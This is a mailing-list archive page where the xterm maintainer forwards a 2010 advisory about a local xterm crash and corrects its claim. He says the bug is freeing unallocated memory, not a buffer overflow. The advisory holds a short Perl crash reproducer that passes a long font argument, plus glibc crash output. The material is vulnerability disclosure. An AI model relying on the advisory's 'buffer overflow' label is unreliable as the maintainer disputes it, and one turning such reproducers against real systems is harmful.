Full Disclosure mailing list archives
[SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability (fwd)
From: Thomas Dickey <dickey () his com>
Date: Wed, 13 Oct 2010 20:05:13 -0400 (EDT)
The report is inaccurate (not a buffer overflow, but freeing unallocated memory). For reference, this is Debian #600129 in xterm's changelog.
-- Thomas E. Dickey http://invisible-island.net ftp://invisible-island.net ---------- Forwarded message ---------- Date: Wed, 13 Oct 2010 19:50:36 -0400 From: Thomas Dickey <tom () invisible-island net> To: Thomas Dickey <dickey () his com> Subject: [Full-disclosure] [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability #Index Previous Next [Full-disclosure] [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability musashi karak0rsan karakorsankara at hotmail.com Wed Sep 1 15:24:30 BST 2010 * Previous message: [Full-disclosure] Month of Abysssec Undisclosed Bugs - Day 1 * Next message: [Full-disclosure] LDAP NULL Bind being picked up, making non PCI compliant * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] _________________________________________________________________ Product: Xterm Vulnerability: Buffer Overflow (heap-based) Credits: Celil Ünüver from SecurityArchitect.Org Tested on: Ubuntu 10.04 and xterm(256) version Details: Xterm's "-fw , -fwb , -fb" command line options causes an overflow while writin g long argument.. PoC: # Contact: www.securityarchitect.org $file = "A" x 500; $print = "xterm -fw $file"; system $print; Results: pc at ubuntu:~/Masaüstü$ perl xterm.pl*** glibc detected *** xterm: munmap_chun k(): invalid pointer: 0x09f593a4 ***======= Backtrace: =========/lib/tls/i686/c mov/libc.so.6(+0x6b591)[0x2fd591]/lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x2fe80 e] Greets: hellcode -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100901/7d 04f506/attachment.html _________________________________________________________________ * Previous message: [Full-disclosure] Month of Abysssec Undisclosed Bugs - Day 1 * Next message: [Full-disclosure] LDAP NULL Bind being picked up, making non PCI compliant * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] _________________________________________________________________ Full-Disclosure is hosted and sponsored by Secunia.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability (fwd) Thomas Dickey (Oct 14)